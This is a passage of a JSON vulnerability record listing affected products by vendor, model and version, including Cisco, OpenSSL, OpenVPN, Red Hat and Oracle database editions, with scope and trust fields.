            "vendor": "cisco",
            "version": "154543.0"
          },
          {
            "model": "beta11",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0"
          },
          {
            "model": "grid engine 32-bit sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "5.3"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.3.1"
          },
          {
            "model": "mds 9216i",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "enterprise linux ws ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.6.3"
          },
          {
            "model": "hardware management console for pseries r3.6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0"
          },
          {
            "model": "s8710 r2.0.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.2"
          },
          {
            "model": "openpkg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openpkg",
            "version": "2.3"
          },
          {
            "model": "stonebeat fullcluster for raptor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.5"
          },
          {
            "model": "hp-ux b.11.00",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "model": "filezilla",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "2.2.28"
          },
          {
            "model": "hp-ux b.11.31",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "model": "novell linux desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "1.0"
          },
          {
            "model": "linux personal x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.2"
          },
          {
            "model": "project openssl e",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "ciscoworks common management foundation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.9"
          },
          {
            "model": "hardware management console for pseries r3.1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0.8"
          },
          {
            "model": "computing snapgear sg710",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "0"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.3"
          },
          {
            "model": "call manager es62",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "solaris 9 sparc",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.1"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.3.132"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.2"
          },
          {
            "model": "css11500 content services switch s",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.10"
          },
          {
            "model": "download accelarator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "prozilla",
            "version": "1.2.1"
          },
          {
            "model": "groupware server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "kolab",
            "version": "2.0.1"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.1"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.2"
          },
          {
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "90002.0(0.86)"
          },
          {
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "255"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.3"
          },
          {
            "model": "css11500 content services switch",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "8.10.2.65"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.4"
          },
          {
            "model": "linux s/390",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "sip proxy server",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "workcentre pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "238"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.5"
          },
          {
            "model": "openvms secure web server",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.2"
          },
          {
            "model": "project openssl k",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "enterprise linux as ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "server b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.8"
          },
          {
            "model": "secure acs for unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.3.5.1"
          },
          {
            "model": "linux enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.1.3"
          },
          {
            "model": "secure acs for unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.3.6.1"
          },
          {
            "model": "workcentre pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "275"
          },
          {
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.10"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "10.0"
          },
          {
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.0"
          },
          {
            "model": "stonebeat webcluster",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "model": "linux lts powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "model": "grid engine update3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "s8500",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "0"
          },
          {
            "model": "secure acs solution engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.3.2"
          },
          {
            "model": "project openssl beta3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "linux i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.10"
          },
          {
            "model": "netbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netbsd",
            "version": "3.0.2"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.3"
          },
          {
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.0.2"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5.1.639"
          },
          {
            "model": "workcentre pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "245"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.5"
          },
          {
            "model": "openvpn",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.9"
          },
          {
            "model": "firewall",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.5.2"
          },
          {
            "model": "linux m68k",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4.0"
          },
          {
            "model": "networks meridian option 11c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1-0"
          },
          {
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.1.0.4"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0(2)"
          },
          {
            "model": "linux hppa",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "netbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netbsd",
            "version": "3.0.1"
          },
          {
            "model": "messaging storage server mm3.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "grid engine 64-bit sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "5.3"
          },
          {
            "model": "enterprise linux ws",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "model": "s8500 cm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "model": "s8710 r2.0.1",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "3.0.1"
          },
          {
            "model": "advanced workstation for the itanium processor ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "hat red hat network satellite server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "4.2"
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1700"
          },
          {
            "model": "netbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netbsd",
            "version": "3.1"
          },
          {
            "model": "application \u0026 content networking software",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.7"
          },
          {
            "model": "grid engine update4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "-releng",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.4"
          },
          {
            "model": "ons mspp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154540"
          },
          {
            "model": "5.4-stable",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.3.30"
          },
          {
            "model": "project openssl j",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "project openssl d",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0.3.728"
          },
          {
            "model": "call manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.3(1)"
          },
          {
            "model": "linux -current",
            "scope": null,
            "trust": 0.3,
            "vendor": "slackware",
            "version": null
          },
          {
            "model": "grid engine update6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "ciscoworks common management foundation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.1"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "home",
            "scope": null,
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": null
          },
          {
            "model": "stonebeat fullcluster for firewall-1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "3.0"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154543.3"
          },
          {
            "model": "ciscosecure acs for windows and unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "hardware management console for iseries r2.1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "tru64 b-4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.1"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.4.1"
          },
          {
            "model": "stonebeat fullcluster for isa server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "3.0"
          },
          {
            "model": "message networking",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5"
          },
          {
            "model": "call manager es55",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0(0)"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.0"
          },
          {
            "model": "css11500 content services switch",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.1"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.5"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "8.0"
          },
          {
            "model": "server 0.9.4e",
            "scope": null,
            "trust": 0.3,
            "vendor": "filezilla",
            "version": null
          },
          {
            "model": "tru64 b-3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.1"
          },
          {
            "model": "linux",
            "scope": null,
            "trust": 0.3,
            "vendor": "gentoo",
            "version": null
          },
          {
            "model": "desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3.0"
          },
          {
            "model": "linux alpha",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5.1.657"
          },
          {
            "model": "secure enterprise linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "trustix",
            "version": "2.0"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.3.1"
          },
          {
            "model": "desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "10.0"
          },
          {
            "model": "project openssl k",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "advanced workstation for the itanium processor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "265"
          },
          {
            "model": "call manager es24",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "model": "hardware management console for pseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.1"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.2"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "10.0"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.3"
          },
          {
            "model": "gss global site selector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "44910"
          },
          {
            "model": "s8300 r2.0.1",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "computing snapgear u2",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "secure",
            "version": "3.1.4"
          },
          {
            "model": "novell linux pos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154542.3(5)"
          },
          {
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.01"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.5.1"
          },
          {
            "model": "project openssl beta1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "-releng",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.3"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.6"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.5"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.0.2"
          },
          {
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "9000"
          },
          {
            "model": "download accelarator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "prozilla",
            "version": "1.3.2"
          },
          {
            "model": "solaris 10 x86",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.2"
          },
          {
            "model": "s8700 r2.0.1",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "computing snapgear sg580",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "0"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.4"
          },
          {
            "model": "system management homepage",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.8"
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1100"
          },
          {
            "model": "stonebeat securitycluster",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.5"
          },
          {
            "model": "ons 15454e optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "openvms secure web server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "1.1-1"
          },
          {
            "model": "application control engine module",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.1"
          },
          {
            "model": "linux ia-32",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.2.1"
          },
          {
            "model": "solaris 9 x86",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "project openssl m",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "gss global site selector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "44920"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.6"
          },
          {
            "model": "project openssl l",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "linux professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.2"
          },
          {
            "model": "network satellite (for rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4)4.2"
          },
          {
            "model": "suse linux openexchange server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "4.0"
          },
          {
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "238"
          },
          {
            "model": "project openssl b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.2"
          },
          {
            "model": "linux mandrake x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "2007.0"
          },
          {
            "model": "ons mstp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154540"
          },
          {
            "model": "networks wlan access point",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "7250.0"
          },
          {
            "model": "project openssl j",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "multimedia",
            "scope": null,
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": null
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.0(2)"
          },
          {
            "model": "peoplesoft enterprise peopletools",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "8.48"
          },
          {
            "model": "peoplesoft enterprise peopletools",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "8.47"
          },
          {
            "model": "peoplesoft enterprise peopletools",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "8.22"
          },
          {
            "model": "oracle9i standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.8"
          },
          {
            "model": "oracle9i standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.7"
          },
          {
            "model": "oracle9i standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.6"
          },
          {
            "model": "oracle9i standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.0.5"
          },
          {
            "model": "oracle9i standard edition fips",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.1.5"
          },
          {
            "model": "oracle9i standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.1.5"
          },
          {
            "model": "oracle9i standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.1.4"
          },
          {
            "model": "oracle9i personal edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.8"
          },
          {
            "model": "oracle9i personal edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.7"
          },
          {
            "model": "oracle9i personal edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.6"
          },
          {
            "model": "oracle9i personal edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.0.5"
          },
          {
            "model": "oracle9i personal edition fips",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.1.5"
          },
          {
            "model": "oracle9i personal edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.1.5"
          },
          {
            "model": "oracle9i personal edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.1.4"
          },
          {
            "model": "oracle9i enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.8.0"
          },
          {
            "model": "oracle9i enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.7.0"
          },
          {
            "model": "oracle9i enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.6.0"
          },
          {
            "model": "oracle9i enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.0.5"
          },
          {
            "model": "oracle9i enterprise edition fips",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.1.5"
          },
          {
            "model": "oracle9i enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.1.5"
          },
          {
            "model": "oracle9i enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.1.4"
          },
          {
            "model": "oracle8i standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "8.1.7.4"
          },
          {
            "model": "oracle8i enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "8.1.7.4.0"
          },
          {
            "model": "oracle10g standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.2.3"
          },
          {
            "model": "oracle10g standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.2.2"
          },
          {
            "model": "oracle10g standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.2.1"
          },
          {
            "model": "oracle10g standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.4.2"
          },
          {
            "model": "oracle10g standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.0.5"
          },
          {
            "model": "oracle10g standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.0.4"
          },
          {
            "model": "oracle10g standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.0.3.1"
          },
          {
            "model": "oracle10g standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.0.3"
          },
          {
            "model": "oracle10g standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.0.2"
          },
          {
            "model": "oracle10g personal edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.2.3"
          },
          {
            "model": "oracle10g personal edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.2.2"
          },
          {
            "model": "oracle10g personal edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.2.1"
          },
          {
            "model": "oracle10g personal edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.0.4"
          },
          {
            "model": "oracle10g personal edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.0.3.1"
          },
          {
            "model": "oracle10g personal edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.0.3"
          },
          {
            "model": "oracle10g personal edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.0.2"
          },
          {
            "model": "oracle10g enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.2.3"
          },
          {
            "model": "oracle10g enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.2.2"
          },
          {
            "model": "oracle10g enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.2.1"
          },
          {
            "model": "oracle10g enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.0.4"
          },
          {
            "model": "oracle10g enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.0.3.1"
          },
          {
            "model": "oracle10g enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.0.3"
          },
          {
